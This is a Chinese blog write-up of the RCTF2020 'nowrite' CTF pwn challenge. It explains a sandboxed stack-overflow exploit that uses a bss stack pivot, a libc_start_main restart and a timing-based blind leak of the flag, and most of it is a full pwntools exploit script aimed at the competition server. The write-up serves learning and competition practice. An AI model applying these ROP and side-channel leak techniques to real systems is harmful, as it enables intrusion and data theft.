RCTF2020_nowrite(libc_start_main的妙用+盲注)

最新推荐文章于 2024-04-24 16:43:17 发布
最新推荐文章于 2024-04-24 16:43:17 发布
阅读量1.2k 收藏 5
点赞数 2
分类专栏: pwn 二进制漏洞 CTF 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/106685468
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏

RCTF2020_nowrite(libc_start_main的妙用+盲注)

首先,检查一下程序的保护机制

检测一下沙箱,发现仅能进行open、read、exit操作,write操作都不行。

然后,我们用IDA分析一下,是一个及其简短的栈溢出程序

程序中没有输出,并且write也禁用了,也没有open函数,execve也禁用了,FULL RELRO也不能进行ret2dl,那么本题只能进行盲注,我们还需要构造出一个open系统调用。但是几乎没有可用的地方可以给我们构造。

找到一条有用的gadgets,如果在bss段上有一个libc某指针,通过这个gadget可以让其指向syscall,这样我们就可以构造open系统调用了。

但是bss段上没有这样的指针,如果有stdout,那么我们可以利用,但是这里没有。由此,想到了libc_start_main。

我们可以先将栈迁移到bss段上,然后调用libc_start_main重启某函数,这样,在bss上就会留下很多libc指针,但是我们不能重启main函数了,因为里面有prctl函数,而prctl调用被禁了。由此,我们可以重启read_n函数,继续输出,劫持自己的返回地址,然后就又可以做rop了。

当在bss段上留下libc指针后,我们就通过gadget将其修改为syscall的地址,然后构造open、read将flag读取到内存当中。

接下来,就是盲注了,在csu上,有一个cmp指令非常有用,我们可以令rbp的低1自己保存着flag对应偏移的1字节,rbp其余字节全为0,然后,我们从rop里传入rbx的值为我们猜测的字符,这样cmp比较,成功后会向下执行pop,我们在后面再布置合适的rop,将栈转移到前面进行重复的cmp,相当于是一个死循环;如果比较失败,则jnz会跳到前面,

然后执行call的时候,会崩溃。

如何来让rbp仅保存flag的1字节是重点。

f

 

l

 

a

 

\x00

 

\x00

 

\x00

 

\x00

 

\x00

 

\x00

 

\x00

 

比如,我们要盲注第3个字符,我们读取3个符,将它存储到rbp-0x2的位置,这样,第3个字符就落到了rbp的位置,同理,我们盲注第n个字符时,从文件中读取n个字节,将它存储到rbp-n+1的位置,而rbp始终是这个地址。如何将值保存到rbp里呢,我们使用栈迁移,这样在leave;ret的时候,pop rbp就将数据存储到了rbp里,接下来就会执行后面的rop,因此,我们在bss段上任意找一个地方,保证其8字节为0,以后,我们就将rbp固定在这,然后事先在这后面布置好rop,接下来flag读取存储到这里后,栈迁移过来进行cmp等操作。

#coding:utf8
from pwn import *

elf = ELF('./no_write')
read_n = 0x00000000004006BF
read_got = elf.got['read']
main_addr = 0x00000000004006E8
ret = 0x000000000040070C

pop_rbp = 0x0000000000400588
#pop rdi ; ret
pop_rdi = 0x0000000000400773
#pop rsi ; pop r15 ; ret
pop_rsi = 0x0000000000400771
#pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
pop = 0x000000000040076b
#pop rbx;pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
csu_pop = 0x000000000040076A
cmp_rbx_rbp = 0x0000000000400761
#leave_ret
leave_ret = 0x000000000040067c
'''
.text:00000000004005B0                 mov     rdx, r15
.text:00000000004005B3                 mov     rsi, r14
.text:00000000004005B6                 mov     edi, r13d
.text:00000000004005B9                 call    qword ptr [r12+rbx*8]
.text:00000000004005BD                 add     rbx, 1
.text:00000000004005C1                 cmp     rbp, rbx
.text:00000000004005C4                 jnz     short loc_4005B0
'''
csu_call = 0x0000000000400750

bss_addr = 0x0000000000601080

call_libc_start_main = 0x0000000000400544

#add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
add_dp_rbp = 0x00000000004005e8

new_stack = bss_addr + 0x600

def blind(index,guess_char):
   #第一步做栈迁移,迁移到bss
   payload = 'a'*0x18 + p64(pop_rdi) + p64(new_stack+0x8) + p64(pop_rsi) + p64(0x00000000006015D0) + p64(0) + p64(read_n)
   payload += p64(pop_rbp) + p64(new_stack) + p64(leave_ret)
   #raw_input()
   sleep(0.2)
   sh.send(payload)
   sleep(0.2)
   #raw_input()
   bss_start = 0x0000000000601078
   #接下来,我们在bss段上,调用read,然后劫持read自己的返回栈
   payload = p64(pop_rdi) + p64(read_n + 0x1C) + p64(call_libc_start_main)
   sh.send(payload)
   #raw_input()
   sleep(0.2)
   #现在,在bss上面,保留了libc指针,通过rop,我们将其值修改为syscall的地址
   target_syscall = 0x00000000006015C0
   #flag文件名字符串的地址
   flag_addr = 0x0000000000601708

   rop = p64(csu_pop)
   rop += p64(0x10000000000000000-0x2) #rbx = -2
   rop += p64(target_syscall + 0x3D) #rbp
   rop += p64(0) #r12
   rop += p64(0) #r13
   rop += p64(0) #r14
   rop += p64(0) #r15
   rop += p64(ret) * 11
   rop += p64(add_dp_rbp)
   #target_syscall后续的rop,是靠当前这个read来输入的
   rop += p64(pop_rdi) + p64(target_syscall + 0x8) + p64(pop_rsi) + p64(0x1000) + p64(0) + p64(read_n)
   #read_n(bss,2)使得rax为2
   rop += p64(pop_rdi) + p64(bss_addr) + p64(pop_rsi) + p64(0x2) + p64(0) + p64(read_n)
   rop += p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0)*2
   #栈迁移到那个target_syscall前方,这样我们就可以执行syscall了
   rop += p64(pop_rbp) + p64(target_syscall - 0x8) + p64(leave_ret)
   rop += './flag\x00'
   sh.send(rop)
   sleep(0.2)
   #raw_input()

   rop_addr = 0x00000000006015C8
   flag_addr = rop_addr + 0x200
   #此次用于输入rop2
   rop = p64(pop_rdi) + p64(flag_addr) + p64(pop_rsi) + p64(0x1000) + p64(0) + p64(read_n)
   #盲注逻辑
   rop += p64(csu_pop)
   rop += p64(0) + p64(1)
   rop += p64(read_got)
   #通过将存储flag的地址位置上移动,达到读取下一个字符的作用
   rop += p64(3) + p64(flag_addr-index) + p64(0x1+index)
   rop += p64(csu_call)
   rop += p64(0)
   #rbx = guess_char
   rop += p64(ord(guess_char))
   #rbp
   rop += p64(flag_addr)
   rop += p64(0)*4
   #栈迁移到flag里面,使得rbp保存了flag的1字节数据
   rop += p64(leave_ret)
   sleep(0.2)
   sh.send(rop)
   #raw_input()
   #使得rax为2
   sh.sendline('a')
   #rop2
   #如果盲注成功,栈重新转移回去,一直比较,使得程序一直处于一个循环,达到延时的目的,不成功则直接崩溃
   rop2 = '\x00'*8 + p64(cmp_rbx_rbp) + p64(0)
   #rbx 重新赋值为guess_char
   rop2 += p64(ord(guess_char))
   #rbp重新转到flag_addr处
   rop2 += p64(flag_addr)
   rop2 += p64(0)*4
   #栈重新回去
   rop2 += p64(leave_ret)
   #raw_input()
   sleep(0.2)
   sh.sendline(rop2)

#blind(1,'C')
#flag里面可能出现的字符
possible_char = []
possible_char.append('_')
#字符的顺序可以影响效率,让频率最高的字符放前面
for x in range(0,10):
   possible_char.append(str(x))
for x in range(ord('A'),ord('Z')+1):
   possible_char.append(chr(x))
for x in range(ord('a'),ord('z')+1):
   possible_char.append(chr(x))

possible_char.append('{')
possible_char.append('}')
possible_char.append('\x00')
OK = False
#flag = 'RCTF{C0mpare_f1ag_0ne_bY_oNe}'
flag = ''
index = 0
while not OK:
   print 'guess (',index,') char'
   length = len(flag)
   for guess_char in possible_char:
      global sh
      #sh = process('./no_write')
      sh = remote('129.211.134.166',6000)
      blind(index,guess_char)
      start = time.time()
      sh.can_recv_raw(timeout = 3)
      end = time.time()
      sh.close()
      if end - start > 3:
         if guess_char == '\x00':
            OK = True
         flag += guess_char
         print 'success guess char at(',index,')'
         index+=1
         break;
   print 'flag=',flag
   if length == len(flag):
      OK = True
      print 'ojbk!'

 

ha1vk
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
IDA动态调试技术及Dump内存
在路上-codingAndlearning
11-20 8681
最近研究SO文件调试和dump内存时,为了完整IDA调试起来,前后摸索了3天才成功,里面有很多坑和细节,稍微不注意,就一直排行,需要理解每步骤的作用意义,否则就会觉得教程不对,要详细的教程可能找不到,大部分都是简单介绍,没有提醒细节和易忽视的点动态调试步骤,顺序严格如下事先准备工作 1、要求root手机或者直接用模拟器 否则没有权限启动android_server 2、IDA在6.6以上版
CS大作业-hello的“一生”
01-01
仅供参考.
linux编程之main()函数启动过程
热门推荐
gary_ygl的专栏
01-15 1万+
1 最简单的程序  1)编辑helloworld程序,$vim helloworld.c 1 #include 2 3 int main (int argc, char *argv[]) 4 { 5 printf("Hello world!\n"); 6 7 return 0; 8 } 2) 编译,$ gcc hellow
解题记录(2)
F_Day_的博客
11-11 236
解题记录(2) 题目不难,但也有思考的地方 题目 如下,保护全开 main函数是调用game函数的,所以主要看一下game函数 主要有下面两点 首先是这一部分,可控的v4,并对数组v5进行写操作,因此这里存在栈溢出,并且能够绕过Canary 第二部分如下,打印刚才写入的单元,但只打印6个字节 分析 函数可利用的就上面介绍的两点,其他的都是打印打印 先看看第一个read的使用,一开始想到的是栈溢出,因为能够绕过canary直接修改函数返回值,但马上想到,由于程序保护全开,地址进行了随机化,所以就没办
OpenHarmony源码学习之编译过程
weixin_42938827的博客
01-07 2076
OpenHarmony构建工具由shell(.sh)、python(.py)、gn(.gn/.gni)、ninja(.ninja)、clang/llvm等构成。本文以 OpenHarmony-v3.2.4-release为例,附上下载链接。
一个C语言程序(进程)运行时原理的剖析
热铁皮屋上的猫的博客
10-15 1397
Linux 1. 入口函数 main函数之前运行的函数称为入口函数或入口点! 程序入口点实际上是指一个程序的初始化和结束部分。 glibc的程序入口为_start(这个入口是由ld链接器默认的链接脚本所指定)_start 由汇编实现,并且和平台相关。 _start: xorl %ebp, %ebp popl %esi movl %esp,%ecx p...
函数栈帧的创建与销毁
Slowstep_的博客
11-27 939
函数栈帧的创建与销毁
linux C/C++运行时库总结归纳
ljl1704的专栏
12-13 2330
描述c运行库与main函数运行前后的内幕
Linux调试私房菜(四)揭开链接器的面纱、汇编语言的内嵌编程
Exp.Joker
06-17 897
源文件被编译后生成目标文件,这些目标文件如何生存最终的可执行程序?链接器的主要作用是把各个模块之间相互引用的部分处理好,使得各个模块之间能够正确的衔接。main()函数是第一个被调用执行的函数吗?链接选项-nostartfiles的意义是什么?链接时不要使用标准的系统启动文件。标准的系统库通常使用,除非使用-nostdlib或-nodefaultlibs。链接器根据什么原则完成具体的工作?在Linux中,进程代码段(.text)的合法起始地址为[0x08048000,0x08049000]8-1.lds8-
运行库和程序初始化
weixin_39077305的博客
05-24 216
入口函数和函数初始化 程序在进入我们编写的入口之前,就已经初始化好了堆栈,外围IO,全局变量等。 这些工作都是函数库完成的,他们才是一个独立程序最开始执行的代码。 入口函数的实现(静态glibc+可执行文件) 首先我们要明白在PC指向E入口地址执行之前,是谁在handle这个ELF文件?应该是装载器(ld),装载器按照其ELF文件中的Program Header等信息将其相关的部分装载内存中,同时也会将用户的参数和环境变量压入栈中。有了这个背景知识,我们可以从Entry point address
nm 命令中 符号详解
xpmwgcwm的博客
12-06 329
符号 类型 说明 A 该符号的值是绝对的,在以后的链接过程中,不允许进行改变。这样的符号值,常常出现在中断向量表中,例如用符号来表示各个中断向量函数在中断向量表中的位置。 B 该符号的值出现在非初始化数据段(bss)中。例如,在一个文件中定义全局static int test。则该符号test的类型为b,位于bss section中。其值表示该符号在bss段中的偏移。一般而言,bss段分...
libc++_shared.rar
07-13
博客资源文件,32位,存在于android\android-ndk-r12b\sources\cxx-stl\llvm-libc++\libs,博客https://blog.csdn.net/u013370255/article/details/107252777
-libc-start-main使用文档的描述
06-09
linux中文档description 如__libc_start_main使用
avr-libc-user-manual-1.6.1.zip_avr libc user manu_it_libc.a
09-24
avr-libc 手册. It is a C library implementation for use with GNU GCC and GNU binutils for development of programs for Atmel s AVR microcontrollers.
libc-html_node.tar.gz_GCC 函数_libc
09-21
1000页。gcc c库函数。完全版本。
libstdc++6_4.7.2-5_amd64.7z
06-23
初始化mysql报错: ./bin/mysqld: /usr/lib64/libstdc++.so.6: version `GLIBCXX_3.4.15..../bin/mysqld: /lib64/libc.so.6: version `GLIBC_2.14' not found (required by ./bin/mysqld) libstdc++6_4.7.2-5_amd64.7z
全视通智慧手术室对讲方案,让手术更安全更高效
最新发布
2301_78035670的博客
04-24 303
全视通智慧手术室对讲方案通过整合等候区公告屏、医护主机、手术间门口机、复苏室主机等多个模块和设备,专用于手术室、护士站、谈话间、复苏室、器械室和其他协同部门,实现了对手术流程的全面管理和监控。
黑龙江—等保测评三级安全设计思路
2403_84237550的博客
04-19 846
本方案在对信息系统可能面临的安全威胁进行分析的基础上,结合安全域的划分,从物理层、网络层、系统层、应用层、数据层和管理层几个安全层面进行了整体的安全设计,在整体保障框架的指导下,综合多种有效的安全防护措施,进行多层和多重防御,实现纵深防御。3、体现了分域防护的思想。不同的安全等级要求具有不同的基本安全保护能力,实现基本安全保护能力将通过选用合适的安全措施或安全控制来保证,可以使用的安全措施或安全控制表现为安全基本要求,依据实现方式的不同,信息系统等级保护的安全基本要求分为技术要求和管理要求两大类。
安全开发实战(4)--whois与子域名爆破
weixin_72543266的博客
04-18 805
安全开发实战(4)--whois与子域名爆破 Whois 查询是一种用于获取有关互联网域名注册信息的公共查询服务。当注册一个域名时,必须提供一些个人或组织信息,例如姓名、电子邮件地址、联系电话等。这些信息通常是公开的,可以通过 Whois 查询来获取。在渗透测试中,Whois 查询可以我们收集目标组织的关键信息。组织联系信息:包括名称、地址、电话号码和电子邮件地址。这些信息可以用于建立联系、进行社会工程攻击或者其他类型的攻击。域名到期日期:了解域名何时到期可以帮助我们预测目标可能面临的安全风险。
__libc_start_main过程机器死机
07-27
__libc_start_main过程是C/C++程序中的主要入口点,它负责初始化程序的运行环境并调用应用程序的主函数。 当机器在__libc_start_main过程中死机时,可能是由于以下原因造成的: 1. 内存溢出:如果应用程序在__libc...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值